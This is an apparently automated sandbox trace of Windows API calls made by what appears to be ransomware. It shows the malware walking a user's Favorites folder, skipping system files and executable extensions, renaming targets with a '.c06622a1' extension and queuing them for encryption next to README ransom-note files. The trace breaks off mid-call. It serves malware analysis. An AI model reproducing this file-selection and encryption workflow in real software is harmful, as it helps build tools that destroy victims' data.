RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.303] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" [0159.303] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 0x4d [0159.303] wcscpy (in: _Dest=0x3250102, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.303] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.c06622a1"), dwFlags=0x8) returned 1 [0159.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1f4 [0159.306] CreateIoCompletionPort (FileHandle=0x1f4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0159.306] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3870020 [0159.312] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x51548dd2 [0159.312] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5ff9e700 [0159.312] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x737c2ff4 [0159.312] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x309409c [0159.313] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4d0fb5ad [0159.313] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x59608913 [0159.313] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x42ece6be [0159.313] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7879eb63 [0159.316] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3870094, Length=0x80) returned 0x3805c778 [0159.316] RtlComputeCrc32 (PartialCrc=0xc778, Buffer=0x3870094, Length=0x80) returned 0x7a95f8c4 [0159.316] RtlComputeCrc32 (PartialCrc=0xf8c4, Buffer=0x3870094, Length=0x80) returned 0xb290f1cf [0159.316] RtlComputeCrc32 (PartialCrc=0xf1cf, Buffer=0x3870094, Length=0x80) returned 0x7ce87265 [0159.316] RtlComputeCrc32 (PartialCrc=0x7265, Buffer=0x3870094, Length=0x80) returned 0x406e55b9 [0159.316] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3870020) returned 1 [0159.316] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.316] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.316] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ca51b00, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8ca51b00, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8ca51b00, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0159.316] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0159.316] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0159.316] _wcsicmp (_Str1="Windows Live Gallery.url", _Str2="README.c06622a1.TXT") returned 5 [0159.316] wcsstr (_Str="Windows Live Gallery.url", _SubStr="README") returned 0x0 [0159.316] _wcsicmp (_Str1="autorun.inf", _Str2="Windows Live Gallery.url") returned -22 [0159.316] wcslen (_String="autorun.inf") returned 0xb [0159.316] _wcsicmp (_Str1="boot.ini", _Str2="Windows Live Gallery.url") returned -21 [0159.316] wcslen (_String="boot.ini") returned 0x8 [0159.316] _wcsicmp (_Str1="bootfont.bin", _Str2="Windows Live Gallery.url") returned -21 [0159.316] wcslen (_String="bootfont.bin") returned 0xc [0159.316] _wcsicmp (_Str1="bootsect.bak", _Str2="Windows Live Gallery.url") returned -21 [0159.316] wcslen (_String="bootsect.bak") returned 0xc [0159.316] _wcsicmp (_Str1="desktop.ini", _Str2="Windows Live Gallery.url") returned -19 [0159.316] wcslen (_String="desktop.ini") returned 0xb [0159.316] _wcsicmp (_Str1="iconcache.db", _Str2="Windows Live Gallery.url") returned -14 [0159.316] wcslen (_String="iconcache.db") returned 0xc [0159.316] _wcsicmp (_Str1="ntldr", _Str2="Windows Live Gallery.url") returned -9 [0159.316] wcslen (_String="ntldr") returned 0x5 [0159.317] _wcsicmp (_Str1="ntuser.dat", _Str2="Windows Live Gallery.url") returned -9 [0159.317] wcslen (_String="ntuser.dat") returned 0xa [0159.317] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Windows Live Gallery.url") returned -9 [0159.317] wcslen (_String="ntuser.dat.log") returned 0xe [0159.317] _wcsicmp (_Str1="ntuser.ini", _Str2="Windows Live Gallery.url") returned -9 [0159.317] wcslen (_String="ntuser.ini") returned 0xa [0159.317] _wcsicmp (_Str1="thumbs.db", _Str2="Windows Live Gallery.url") returned -3 [0159.317] wcslen (_String="thumbs.db") returned 0x9 [0159.317] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0159.317] wcslen (_String="386") returned 0x3 [0159.317] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0159.317] wcslen (_String="adv") returned 0x3 [0159.317] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0159.317] wcslen (_String="ani") returned 0x3 [0159.317] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0159.317] wcslen (_String="bat") returned 0x3 [0159.317] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0159.317] wcslen (_String="bin") returned 0x3 [0159.317] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0159.317] wcslen (_String="cab") returned 0x3 [0159.317] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0159.317] wcslen (_String="cmd") returned 0x3 [0159.317] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0159.317] wcslen (_String="com") returned 0x3 [0159.317] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0159.317] wcslen (_String="cpl") returned 0x3 [0159.317] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0159.317] wcslen (_String="cur") returned 0x3 [0159.317] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0159.317] wcslen (_String="deskthemepack") returned 0xd [0159.317] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0159.317] wcslen (_String="diagcab") returned 0x7 [0159.317] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0159.317] wcslen (_String="diagcfg") returned 0x7 [0159.317] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0159.318] wcslen (_String="diagpkg") returned 0x7 [0159.318] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0159.318] wcslen (_String="dll") returned 0x3 [0159.318] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0159.318] wcslen (_String="drv") returned 0x3 [0159.318] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0159.318] wcslen (_String="exe") returned 0x3 [0159.318] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0159.318] wcslen (_String="hlp") returned 0x3 [0159.318] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0159.318] wcslen (_String="icl") returned 0x3 [0159.318] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0159.318] wcslen (_String="icns") returned 0x4 [0159.318] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0159.318] wcslen (_String="ico") returned 0x3 [0159.318] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0159.318] wcslen (_String="ics") returned 0x3 [0159.318] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0159.318] wcslen (_String="idx") returned 0x3 [0159.318] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0159.318] wcslen (_String="ldf") returned 0x3 [0159.318] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0159.318] wcslen (_String="lnk") returned 0x3 [0159.318] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0159.318] wcslen (_String="mod") returned 0x3 [0159.318] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0159.318] wcslen (_String="mpa") returned 0x3 [0159.318] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0159.318] wcslen (_String="msc") returned 0x3 [0159.318] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0159.318] wcslen (_String="msp") returned 0x3 [0159.318] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0159.318] wcslen (_String="msstyles") returned 0x8 [0159.318] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0159.318] wcslen (_String="msu") returned 0x3 [0159.318] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0159.319] wcslen (_String="nls") returned 0x3 [0159.319] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0159.319] wcslen (_String="nomedia") returned 0x7 [0159.319] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0159.319] wcslen (_String="ocx") returned 0x3 [0159.319] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0159.319] wcslen (_String="prf") returned 0x3 [0159.319] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0159.319] wcslen (_String="ps1") returned 0x3 [0159.319] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0159.319] wcslen (_String="rom") returned 0x3 [0159.319] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0159.319] wcslen (_String="rtp") returned 0x3 [0159.319] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0159.319] wcslen (_String="scr") returned 0x3 [0159.319] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0159.319] wcslen (_String="shs") returned 0x3 [0159.319] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0159.319] wcslen (_String="spl") returned 0x3 [0159.319] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0159.319] wcslen (_String="sys") returned 0x3 [0159.319] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0159.319] wcslen (_String="theme") returned 0x5 [0159.319] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0159.319] wcslen (_String="themepack") returned 0x9 [0159.319] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0159.319] wcslen (_String="wpx") returned 0x3 [0159.319] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0159.319] wcslen (_String="lock") returned 0x4 [0159.319] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0159.319] wcslen (_String="key") returned 0x3 [0159.319] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0159.319] wcslen (_String="hta") returned 0x3 [0159.319] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0159.319] wcslen (_String="msi") returned 0x3 [0159.319] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0159.320] wcslen (_String="pdb") returned 0x3 [0159.320] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0159.320] wcslen (_String="sqlite") returned 0x6 [0159.320] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live")) returned 0x10 [0159.320] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.320] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0159.320] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned 0x38 [0159.320] wcscpy (in: _Dest=0x32400d2, _Source="Windows Live Gallery.url" | out: _Dest="Windows Live Gallery.url") returned="Windows Live Gallery.url" [0159.320] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url", dwFileAttributes=0x80) returned 1 [0159.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0159.320] SetFilePointerEx (in: hFile=0x1c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0159.320] CloseHandle (hObject=0x1c) returned 1 [0159.320] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.320] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" [0159.320] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 0x51 [0159.320] wcscpy (in: _Dest=0x325010a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.321] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.c06622a1"), dwFlags=0x8) returned 1 [0159.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c [0159.323] CreateIoCompletionPort (FileHandle=0x1c, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0159.323] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3900020 [0159.330] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4fb5be30 [0159.330] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3cc74659 [0159.330] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xfae1515 [0159.330] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xbf2267 [0159.330] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x12dfa035 [0159.330] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7ce4ab39 [0159.330] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xdfad148 [0159.330] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7a4dee78 [0159.333] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3900094, Length=0x80) returned 0x9b45fe6f [0159.333] RtlComputeCrc32 (PartialCrc=0xfe6f, Buffer=0x3900094, Length=0x80) returned 0x36c7e60d [0159.333] RtlComputeCrc32 (PartialCrc=0xe60d, Buffer=0x3900094, Length=0x80) returned 0xa3e85956 [0159.333] RtlComputeCrc32 (PartialCrc=0x5956, Buffer=0x3900094, Length=0x80) returned 0xd95fe89c [0159.333] RtlComputeCrc32 (PartialCrc=0xe89c, Buffer=0x3900094, Length=0x80) returned 0xb1c9b12a [0159.333] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3900020) returned 1 [0159.334] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.334] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.334] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0159.334] _wcsicmp (_Str1="Windows Live Mail.url", _Str2="README.c06622a1.TXT") returned 5 [0159.334] wcsstr (_Str="Windows Live Mail.url", _SubStr="README") returned 0x0 [0159.334] _wcsicmp (_Str1="autorun.inf", _Str2="Windows Live Mail.url") returned -22 [0159.334] wcslen (_String="autorun.inf") returned 0xb [0159.334] _wcsicmp (_Str1="boot.ini", _Str2="Windows Live Mail.url") returned -21 [0159.334] wcslen (_String="boot.ini") returned 0x8 [0159.334] _wcsicmp (_Str1="bootfont.bin", _Str2="Windows Live Mail.url") returned -21 [0159.334] wcslen (_String="bootfont.bin") returned 0xc [0159.334] _wcsicmp (_Str1="bootsect.bak", _Str2="Windows Live Mail.url") returned -21 [0159.334] wcslen (_String="bootsect.bak") returned 0xc [0159.334] _wcsicmp (_Str1="desktop.ini", _Str2="Windows Live Mail.url") returned -19 [0159.334] wcslen (_String="desktop.ini") returned 0xb [0159.334] _wcsicmp (_Str1="iconcache.db", _Str2="Windows Live Mail.url") returned -14 [0159.334] wcslen (_String="iconcache.db") returned 0xc [0159.334] _wcsicmp (_Str1="ntldr", _Str2="Windows Live Mail.url") returned -9 [0159.334] wcslen (_String="ntldr") returned 0x5 [0159.334] _wcsicmp (_Str1="ntuser.dat", _Str2="Windows Live Mail.url") returned -9 [0159.334] wcslen (_String="ntuser.dat") returned 0xa [0159.334] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Windows Live Mail.url") returned -9 [0159.334] wcslen (_String="ntuser.dat.log") returned 0xe [0159.334] _wcsicmp (_Str1="ntuser.ini", _Str2="Windows Live Mail.url") returned -9 [0159.334] wcslen (_String="ntuser.ini") returned 0xa [0159.334] _wcsicmp (_Str1="thumbs.db", _Str2="Windows Live Mail.url") returned -3 [0159.334] wcslen (_String="thumbs.db") returned 0x9 [0159.334] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0159.334] wcslen (_String="386") returned 0x3 [0159.334] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0159.334] wcslen (_String="adv") returned 0x3 [0159.334] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0159.334] wcslen (_String="ani") returned 0x3 [0159.335] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0159.335] wcslen (_String="bat") returned 0x3 [0159.335] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0159.335] wcslen (_String="bin") returned 0x3 [0159.335] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0159.335] wcslen (_String="cab") returned 0x3 [0159.335] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0159.335] wcslen (_String="cmd") returned 0x3 [0159.335] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0159.335] wcslen (_String="com") returned 0x3 [0159.335] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0159.335] wcslen (_String="cpl") returned 0x3 [0159.335] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0159.335] wcslen (_String="cur") returned 0x3 [0159.335] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0159.335] wcslen (_String="deskthemepack") returned 0xd [0159.335] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0159.335] wcslen (_String="diagcab") returned 0x7 [0159.335] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0159.335] wcslen (_String="diagcfg") returned 0x7 [0159.335] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0159.335] wcslen (_String="diagpkg") returned 0x7 [0159.335] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0159.335] wcslen (_String="dll") returned 0x3 [0159.335] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0159.335] wcslen (_String="drv") returned 0x3 [0159.335] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0159.335] wcslen (_String="exe") returned 0x3 [0159.335] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0159.335] wcslen (_String="hlp") returned 0x3 [0159.335] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0159.335] wcslen (_String="icl") returned 0x3 [0159.335] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0159.335] wcslen (_String="icns") returned 0x4 [0159.335] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0159.335] wcslen (_String="ico") returned 0x3 [0159.335] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0159.336] wcslen (_String="ics") returned 0x3 [0159.336] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0159.336] wcslen (_String="idx") returned 0x3 [0159.336] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0159.336] wcslen (_String="ldf") returned 0x3 [0159.336] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0159.336] wcslen (_String="lnk") returned 0x3 [0159.336] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0159.336] wcslen (_String="mod") returned 0x3 [0159.336] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0159.336] wcslen (_String="mpa") returned 0x3 [0159.336] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0159.336] wcslen (_String="msc") returned 0x3 [0159.336] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0159.336] wcslen (_String="msp") returned 0x3 [0159.336] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0159.336] wcslen (_String="msstyles") returned 0x8 [0159.336] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0159.336] wcslen (_String="msu") returned 0x3 [0159.336] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0159.336] wcslen (_String="nls") returned 0x3 [0159.336] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0159.336] wcslen (_String="nomedia") returned 0x7 [0159.336] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0159.336] wcslen (_String="ocx") returned 0x3 [0159.336] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0159.336] wcslen (_String="prf") returned 0x3 [0159.336] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0159.336] wcslen (_String="ps1") returned 0x3 [0159.336] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0159.336] wcslen (_String="rom") returned 0x3 [0159.336] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0159.336] wcslen (_String="rtp") returned 0x3 [0159.336] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0159.336] wcslen (_String="scr") returned 0x3 [0159.336] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0159.337] wcslen (_String="shs") returned 0x3 [0159.337] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0159.337] wcslen (_String="spl") returned 0x3 [0159.337] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0159.337] wcslen (_String="sys") returned 0x3 [0159.337] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0159.337] wcslen (_String="theme") returned 0x5 [0159.337] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0159.337] wcslen (_String="themepack") returned 0x9 [0159.337] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0159.337] wcslen (_String="wpx") returned 0x3 [0159.337] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0159.337] wcslen (_String="lock") returned 0x4 [0159.337] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0159.337] wcslen (_String="key") returned 0x3 [0159.337] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0159.337] wcslen (_String="hta") returned 0x3 [0159.337] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0159.337] wcslen (_String="msi") returned 0x3 [0159.337] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0159.337] wcslen (_String="pdb") returned 0x3 [0159.337] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0159.337] wcslen (_String="sqlite") returned 0x6 [0159.337] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live")) returned 0x10 [0159.337] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.337] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0159.337] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned 0x38 [0159.337] wcscpy (in: _Dest=0x32400d2, _Source="Windows Live Mail.url" | out: _Dest="Windows Live Mail.url") returned="Windows Live Mail.url" [0159.337] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url", dwFileAttributes=0x80) returned 1 [0159.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0159.338] SetFilePointerEx (in: hFile=0x1d4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0159.338] CloseHandle (hObject=0x1d4) returned 1 [0159.338] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.338] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS 